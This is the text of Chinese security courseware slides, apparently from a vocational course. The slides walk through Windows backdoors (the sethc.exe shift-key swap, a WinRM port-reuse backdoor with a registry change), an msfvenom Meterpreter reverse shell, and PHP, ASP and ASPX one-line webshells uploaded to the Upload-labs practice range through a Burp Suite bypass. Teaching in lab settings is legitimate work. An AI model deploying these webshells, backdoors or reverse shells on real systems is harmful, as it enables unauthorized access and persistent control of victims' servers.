Windows服务器用户管理02Windows服务器共享管理03Windows服务器网站管理04延迟符z06070805Windows服务器远程管理Windows域管理Windows应用安全Windows内网安全07Windows应用安全本项目是Windows应用安全,重点介绍与Windows应用相关的漏洞如Windows系统后门、Windows反弹木马等,通过网站Webshell应用的介绍,使学生对Windows服务器安全有了进一步的认识。延迟符Windows应用安全Windows应用后门WebShell上传和连接延迟符本任务介绍了Windows后门的概念、Windows“shift”后门以及如何在Windows远程管理中部署端口复用后门。此处添加标题AddthistitleWindows应用后门任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务介绍了Windows后门的概念、Windows“shift”后门以及如何在Windows远程管理中部署端口复用后门。后门Windows系统后门Windows“5次shift”后门Windows端口复用后门Windows反弹木马延迟符此处添加标题Addthistitle必备知识——后门延迟符
后门是指绕过安全控制而获取对程序或系统访问权的方法。主机上的后门来源主要有以下几种:(1)攻击者利用欺骗的手段,通过发送电子邮件或者文件,诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。(2)攻击者攻陷一台主机,获得其控制权后,在主机上建立后门,比如安装木马程序,以便下一次入侵时使用。(3)这是软件开发过程中引入的后门。在软件的开发阶段,程序员常会在软件内创建后门以方便测试或者修改程序中的缺陷,但在软件发布时,后门被有意或者无意忽视了,没有被删除,那么这个软件天生就存在后门,安装该软件的主机就不可避免的引入了后门。此处添加标题Addthistitle必备知识——Windows系统后门延迟符
Windows系统中通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门的持久化性更强。此处添加标题Addthistitle任务实施——
Windows“5次shift”后门延迟符
当未登陆Windows系统(停留在登陆界面)的时候,系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift,系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序。此处添加标题Addthistitle任务实施——
Windows“5次shift”后门延迟符
将sethc.exe替换为cmd.exe,连续按5次shift后,系统将会以system用户启用cmd.exe,无需登录即可执行命令。此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
(1)实验原理该后门的基本原理是使用Windows的远程管理的管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。后门连接是需要目标服务器的高权用户的明文密码的,需要先抓取相应的明文密码才可部署后门。首先查看目标服务器时候能够正常使用WinRM服务此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
(1)实验原理该后门的基本原理是使用Windows的远程管理的管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。后门连接是需要目标服务器的高权用户的明文密码的,需要先抓取相应的明文密码才可部署后门。(2)环境检测首先查看目标服务器时候能够正常使用WinRM服务此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
(3)复用80端口目标服务器本身是存在IISWeb应用服务,开放端口也是默认的80端口此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
对于原本就开放了WinRM服务的机器来讲,需要保留原本的5985端口listener,同时需要新增一个80端口的listener,这样既能保证原来的5985端口管理员可以使用此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
对于安装Windows2012及以上版本操作系统的服务器来讲,只需要这一条命令即可实现端口复用。这种情况下,老的5985端口listener还保留着此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
(4)后门的使用本地需要连接WinRM服务时,首先也需要配置启动WinRM服务,然后需要设置信任连接的主机,执行以下两条命令即可此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
开启WinRM客户端后,使用winrs命令即可连接远程WinRM服务执行命令(这里的账号密码即是目标服务器本地存在的用户)此处添加标题Addthistitle任务实施——
Windows端口复用后门延迟符
(5)非管理员用户登录WinRM服务是受UAC影响的,所以本地管理员用户组里面只有administrator可以登录,其他管理员用户是没法远程登录WinRM的。要允许本地管理员组的其他用户登录WinRM,需要修改注册表设置。regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System/vLocalAccountTokenFilterPolicy/tREG_DWORD/d1/f此处添加标题Addthistitle任务实施——
Windows反弹木马延迟符
(1)在KaliLinux中模式下输入如下代码msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=lport=4444-fexe-oshell.exe此处添加标题Addthistitle任务实施——
Windows反弹木马延迟符
(2)在KaliLinux中进入Metasploit,进入反弹木马模块,开启监听模式。此处添加标题Addthistitle任务实施——
Windows反弹木马延迟符
(3)将生成的shell.exe在Windows系统中运行,Kali成功连入Windows系统此处添加标题Addthistitle任务实施——
Windows反弹木马延迟符
Meterpreter是MetasploitFramework提供的最常用的攻击载荷(payload)之一,如其模式下输入执行shellWindows应用安全Windows应用后门WebShell上传和连接延迟符本任务介绍了木马的作用、WebShell的分类以及通过Windows网站上传WebShell,连接后台的过程。此处添加标题AddthistitleWebShell上传和连接任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务介绍了木马的作用、WebShell的分类以及通过Windows网站上传WebShell,连接后台的过程。木马WebShellUpload-labs靶场Upload-labs靶场上传网站木马WebShell利用“中国菜刀”连接木马网页延迟符此处添加标题Addthistitle必备知识——木马延迟符
木马病毒是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等,同时可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据黑客意图突然发起攻击。此处添加标题Addthistitle必备知识——WebShell延迟符
“Web”的含义是服务器开放Web服务;“Shell”的含义是取得对服务器某种程度上的操作权限;“WebShell"就是获取对服务器的控制权限,这就需要借助一些WebShell管理工具和一些漏洞去得到这种权限。在使用WebShell管理工具之前,需要先在目标服务器上传或创建一个木马文件。木马分为大马、小马和一句话木马:(1)小马:文件体积小、上传文件、文件修改、文件管理(2)大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)(3)一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)例如:php语言中<?php@eval($_POST['caidao'];?)>asp语言中<%evalrequest("caidao")%>aspx语言中<%@PageLanguage="Jscript"%><%eval(Request.Item["aaa"],"unsafe");%>
此处添加标题Addthistitle必备知识——
Upload-labs靶场延迟符
Upload-Labs是一个使用PHP语言编写、专注于文件上传漏洞的闯关式网络安全靶场。练习该靶场可以有效地了解并掌握文件上传漏洞的原理、利用方法和修复方案。此处添加标题Addthistitle任务实施——WindowsServer2019中安装网站应用延迟符
1)在虚拟机WindowsServer2019中,点击桌面phpStudy安装程序,选择安装路径,单击按钮进行安装,安装之后程序会启动Apache、MySQL服务。2)在phpStudy程序目录下添加upload-labs-master网站,。3)利用物理机的浏览器访问虚拟机WindowsServer2019的upload-labs网站。此处添加标题Addthistitle任务实施——
上传网站木马WebShell延迟符
(1)在物理机上创建文件webshell.php,代码如下:Gif89a<?php@eval($_POST['as']);?>(2)点击upload-labs网站中的Pass-01(第一关),单击上传按钮,选择webshell.php,此时出现“文件不允许上传”,(3)查看Pass-01的源代码如下:<scripttype="text/javascript">functioncheckFile(){varfile=document.getElementsByName('upload_file')[0].value;if(file==null||file==""){alert("请选择要上传的文件!");returnfalse;}//定义允许上传的文件类型varallow_ext=".jpg|.png|.gif";//提取上传文件的类型varext_name=file.substring(file.lastIndexOf("."));//判断上传文件类型是否允许上传if(allow_ext.indexOf(ext_name)==-1){varerrMsg="该文件不允许上传,请上传"+allow_ext+"类型的文件,当前文件类型为:"+ext_name;alert(errMsg);returnfalse;}}此处添加标题Addthistitle任务实施——
上传网站木马WebShell延迟符
(4)单击物理机浏览器的设置选项如图7-2-7,打开计算机的代理设置如图7-2-8,在“internet属性”中单击局域网设置,勾选LAN代理,点击确定”,任务实施——
上传网站木马WebShell此处添加标题Addthistitle任务实施——
上传网站木马WebShell延迟符
(5)启动Burpsuite软件,将webshell.php文件名改为webshell.jpg,在网页中选择此文件,单击上传所示,此时Burpsuite软件会拦截上传信息此处添加标题Addthistitle任务实施——
上传网站木马WebShell延迟符
(6)修改上传文件名,将webshell.jpg改为webshell.php,点击按钮使Burpsuite状态变为“interceptisoff”,此时木马成功上传,访问木马网页此处添加标题Addthistitle任务实施——利用“中国菜刀”连接木马网页延迟符
利用“中国菜刀”连接工具尝试连接木马网页,在“地址”中填写上传一句话木马的URL,在后面的方框中填写所要连接的参数。此处添加标题Addthistitle任务实施——利用“中国菜刀”连接木马网页延迟符
添加完成之后,可以对目标服务器进行控制,查看系统文件,添加系统用户。此处添加标题Addthistitle项目总结——
Windows应用安全
本项目主要介绍了Windows木马、后门以及Metasploit工具的使用。党的二十大中强调了网络安全意识的教育,通过本项目的教学,学生们深刻理解了网络攻击的危害性,掌握了Windows应用的渗透技术,提高了网络安全的防范意识。CONTENTS目录z走进Windows服务器01
Windows服务器用户管理02Windows服务器共享管理03Windows服务器网站管理04延迟符z06070805Windows服务器远程管理Windows域管理Windows应用安全Windows内网安全08Windows内网安全本项目是Windows内网安全,项目通过两个任务介绍了内网安全的基础知识和内网渗透的相关步骤,通过实际案例讲述了网络攻击的一般流程,本项目提升了学生对内网安全的关注度,为今后从事网络运维相关工作做准备。延迟符Windows内网安全认识内网安全内网渗透实战延迟符本任务介绍了内网中端口映射、内网转发、代理、socket协议等相关概念,讲述了信息收集与密码抓取的方法,为后面学习内网渗透的实际案例做准备。此处添加标题Addthistitle认识内网安全任务分析Taskanalysis必备知识Essentialknowledge任务实施Taskimplementation操作步骤Operationsteps本任务介绍了内网中端口映射、内网转发、代理、socket协议等相关概念,讲述了信息收集与密码抓取的方法,为后面学习内网渗透的实际案例做准备。内网安全端口映射和内网转发网络代理和Socket协议信息收集和密码获取基于ew反向代理
Nmap信息收集mimikatz工具抓取密码延迟符此处添加标题Addthistitle必备知识——内网安全延迟符
内网安全指的是网络内部计算机客户端的安全。目前内部网络面临的主要安全威胁包括资产管理失控、网络资源滥用、病毒蠕虫入侵、外部非法接入、内部非法外联、重要信息泄密、补丁管理混乱等。此处添加标题Addthistitle必备知识——端口映射和内网转发延迟符
端口映射
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025下半年四川雅安天全县事业单位招聘19人历年高频重点提升(共500题)附带答案详解
- 2025下半年北京市国土资源局事业单位招聘2人历年高频重点提升(共500题)附带答案详解
- 2025上海市教育考试院公开招聘4人高频重点提升(共500题)附带答案详解
- 2025上半年浙江省安吉县机关事业单位招聘73人历年高频重点提升(共500题)附带答案详解
- 2025上半年江苏省南通启东市事业单位招聘84人历年高频重点提升(共500题)附带答案详解
- 2025上半年四川省自贡荣县事业单位考试聘用110人高频重点提升(共500题)附带答案详解
- 2025上半年四川省内江市市中区部分事业单位招聘72人历年高频重点提升(共500题)附带答案详解
- 2025上半四川南充经济开发区应急响应中心招聘历年高频重点提升(共500题)附带答案详解
- 高等院校教师聘用合同样稿
- 游艇俱乐部内墙翻新刮瓷协议
- 顾建民高等教育学知识点总结【呕心沥血整理】
- 长笛演奏风格探析课程设计
- 曲阜师范大学教育经济学期末复习题
- 电影第一出品单位变更协议模板
- 2023-2024学年北师大版数学九年级上册期末测试卷
- 河南省郑州市2023-2024学年七年级上学期期末生物试题(含答案)
- 2023瑞幸员工合同协议书
- 2023年《思想道德与法治》期末考试复习题库(带答案)
- 大气数据测试仪校准规范
- 升降柱 施工方案
- 江苏省南通市崇川区启秀中学2021-2022学年九年级上学期期末物理试卷
评论
0/150
提交评论